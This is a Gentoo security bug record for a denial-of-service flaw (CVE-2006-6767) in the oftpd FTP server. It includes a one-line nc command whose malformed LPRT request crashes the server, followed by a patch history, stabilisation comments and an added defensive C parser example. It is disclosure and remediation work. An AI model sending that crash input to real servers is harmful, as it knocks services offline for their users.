Bug 159178 - net-ftp/oftpd: denial of service CVE-2006-6767
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High normal
Assignee: Gentoo Security
Whiteboard: B3? [glsa]
Reported: 2006-12-26 17:30 UTC by Tavis Ormandy (RETIRED)
Modified: 2007-02-11 10:24 UTC

Attachments
lprt assertion patch (oftpd.diff,550 bytes, patch)
2006-12-27 03:40 UTC, Tavis Ormandy (RETIRED)
Description Tavis Ormandy (RETIRED) gentoo-dev 2006-12-26 17:30:32 UTC
If you send an LPRT with an address family that is != 4 or 6, oftpd will die.

$ nc localhost 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
$ nc localhost 21 
localhost [127.0.0.1] 21 (ftp) : Connection refused
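
The failure mode reported above, as an added example that is not oftpd's code or the attached patch: an RFC 1639 LPRT argument parser that treats the address family as untrusted input and returns a reply code (521 for a family other than 4 or 6) instead of aborting the process. The names `parse_lprt`, `struct lprt` and `next_field` are hypothetical, and the argument is assumed to arrive with the command verb and CRLF already stripped.

```c
#include <stdlib.h>
#include <string.h>
/* Added example, not oftpd source. RFC 1639 argument layout:
 * af,hal,h1..hN,pal,p1..pM  with every field a decimal 0-255. */
enum lprt_result { LPRT_OK = 200, LPRT_SYNTAX = 501, LPRT_BAD_FAMILY = 521 };

struct lprt {                 /* hypothetical result type */
    unsigned char family, addr[16];
    size_t addr_len;
    unsigned port;
};

/* Read one field; *more is set when a comma (another field) follows. */
static int next_field(const char **p, int *more)
{
    char *end;
    long v;
    if (**p < '0' || **p > '9') return -1;   /* no sign, no whitespace */
    v = strtol(*p, &end, 10);
    if (v > 255) return -1;                  /* also catches overflow */
    *more = (*end == ',');
    if (!*more && *end != '\0') return -1;   /* junk after the number */
    *p = *more ? end + 1 : end;
    return (int)v;
}

/* Returns the FTP reply code to send; *out is valid only on LPRT_OK. */
enum lprt_result parse_lprt(const char *arg, struct lprt *out)
{
    int more = 0, af, hal, pal, v, i;
    memset(out, 0, sizeof *out);
    if ((af = next_field(&arg, &more)) < 0 || !more) return LPRT_SYNTAX;
    /* Client-controlled value: answer with 521, never assert() on it. */
    if (af != 4 && af != 6) return LPRT_BAD_FAMILY;
    if ((hal = next_field(&arg, &more)) < 0 || !more) return LPRT_SYNTAX;
    if (hal != (af == 4 ? 4 : 16)) return LPRT_SYNTAX;
    for (i = 0; i < hal; i++) {
        if ((v = next_field(&arg, &more)) < 0 || !more) return LPRT_SYNTAX;
        out->addr[i] = (unsigned char)v;
    }
    if ((pal = next_field(&arg, &more)) < 0 || !more || pal != 2) return LPRT_SYNTAX;
    for (i = 0; i < 2; i++) {   /* exactly two port bytes, nothing after */
        if ((v = next_field(&arg, &more)) < 0 || more != (i == 0)) return LPRT_SYNTAX;
        out->port = (out->port << 8) | (unsigned)v;
    }
    out->family = (unsigned char)af;
    out->addr_len = (size_t)hal;
    return LPRT_OK;
}
```
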
Comment 1 Tavis Ormandy (RETIRED) gentoo-dev 2006-12-27 03:40:58 UTC
Created attachment 104795
lprt assertion patch

simple patch that solves this problem for me.
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2006-12-29 02:58:18 UTC
eradicator: please provide an updated ebuild
Comment 3 Roy Marples (RETIRED) gentoo-dev 2007-01-04 04:39:18 UTC
-r3 added to portage with attached patch. Thanks.
Comment 4 Tavis Ormandy (RETIRED) gentoo-dev 2007-01-04 04:49:24 UTC
Arches: please test and mark stable net-ftp/oftpd-0.3.7-r3

target KEYWORDS="amd64 arm ppc64 sh sparc x86"
Comment 5 Timothy Redaelli (RETIRED) gentoo-dev 2007-01-04 06:00:39 UTC
nothing to do
Comment 6 Gustavo Zacarias (RETIRED) gentoo-dev 2007-01-04 11:22:54 UTC
sparc stable.
Comment 7 Tom Gall (RETIRED) gentoo-dev 2007-01-04 21:18:29 UTC
stable on ppc64
Comment 8 Christian Faulhammer (RETIRED) gentoo-dev 2007-01-05 00:30:37 UTC
x86 stable
Comment 9 Steve Dibb (RETIRED) gentoo-dev 2007-01-05 06:18:18 UTC
amd64 stable
Comment 10 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-14 20:47:00 UTC
I vote for a GLSA.
Comment 11 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-14 23:03:42 UTC
tavis votes yes
Comment 12 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-01-15 23:03:57 UTC
GLSA 200701-09, thanks everybody